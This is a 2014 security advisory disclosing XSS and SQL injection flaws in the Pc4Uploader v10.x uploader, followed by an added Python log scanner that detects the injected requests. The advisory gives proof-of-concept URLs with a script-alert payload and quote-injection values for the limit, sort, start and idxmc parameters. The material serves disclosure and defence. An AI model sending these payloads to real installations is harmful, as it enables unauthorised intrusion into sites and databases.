
Pc4Uploader v10.x - Cross Site Scripting - SQL injection

Author: Dr.web , Published: 24-10-2014
***************************************************
# Title: Pc4Uploader v10.x - Cross Site Scripting - SQL injection
# Author: Dr.web
# Vendor Homepage: http://pc4arb.com
# Contact: u8p@hotmail.com ; skype: dr.web559
# Greets To: Brg alshmail - a!7rBi - x_man_3r3r - Hannibal Ksa - QaTaR-Attack - mr.hx - XP - r3m0t3Nu11 - xdr.devilx - lov3rdns - xSecurity
***************************************************
a) Cross Site Scripting
Affected parameters (XSS): limit, sort, start
#exp : http://localhost/up4/index.php?limit=[XSS code here]&mod=search&sort=1&start=20&word=1
#exp2: http://localhost/up4/index.php?limit=1&mod=search&sort=[XSS code here]&start=20&word=1
#exp3 : http://localhost/up4/index.php?limit=1&mod=search&sort=1&start=[XSS code here]&word=1
#exp XSS code : '><script>alert(1)</script>
b) SQL injection
Affected parameters (SQLi): limit, sort, start
#exp : http://localhost/up4/index.php?limit=1%27&mod=search&sort=idx&start=20&word=1

c) SQL injection
code.php -> sqli :D
Affected parameter (SQLi): idxmc
#exp : http://localhost/up4/code.php?d=1&f=load&idxmc=1%27&sb=250

Note: the result appears when you download the file and open it; the file shows the text produced by the affected parameter.
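
A defender's check for the requests listed above, as an added example (not part of the original advisory and not Pc4Uploader code): it flags access-log requests whose limit, sort, start or idxmc values are not plain tokens. The expected value shapes and the sample log lines are assumptions constructed for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed value shapes (not taken from the Pc4Uploader source): the advisory's
# benign values are integers for limit/start/idxmc and "1" / "idx" for sort.
RULES = {
    "index.php": {
        "limit": re.compile(r"\d{1,6}"),
        "start": re.compile(r"\d{1,9}"),
        "sort": re.compile(r"[A-Za-z0-9_]{1,32}"),
    },
    "code.php": {"idxmc": re.compile(r"\d{1,9}")},
}

def check_request(target):
    """Return [(param, decoded_value)] for listed parameters that break their rule."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    rules = RULES.get(script)
    if not rules:
        return []
    query = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for name, pattern in rules.items():
        for value in query.get(name, []):  # repeated parameters are all checked
            if not pattern.fullmatch(value):
                findings.append((name, value))
    return findings

def scan_access_log(lines):
    """Yield (client_ip, request_target, findings) for suspicious log lines."""
    request_re = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
    for line in lines:
        m = request_re.match(line)
        findings = check_request(m.group(2)) if m else []
        if findings:
            yield m.group(1), m.group(2), findings

# Constructed sample lines (combined log format), modelled on the advisory's URLs.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Oct/2014:10:00:01 +0000] "GET /up4/index.php?limit=1&mod=search&sort=idx&start=20&word=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [24/Oct/2014:10:00:07 +0000] "GET /up4/index.php?limit=1%27&mod=search&sort=idx&start=20&word=1 HTTP/1.1" 200 731',
    '192.0.2.44 - - [24/Oct/2014:10:00:09 +0000] "GET /up4/index.php?limit=1&mod=search&sort=%27%3E%3Cscript%3Ealert(1)%3C/script%3E&start=20&word=1 HTTP/1.1" 200 5200',
    '192.0.2.44 - - [24/Oct/2014:10:00:12 +0000] "GET /up4/code.php?d=1&f=load&idxmc=1%27&sb=250 HTTP/1.1" 200 412',
]

if __name__ == "__main__":
    for ip, target, findings in scan_access_log(SAMPLE_LOG):
        print(ip, target, findings)
```

The same per-parameter rules can be enforced in front of the application as input validation; they do not replace parameterized queries and output encoding in index.php and code.php.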
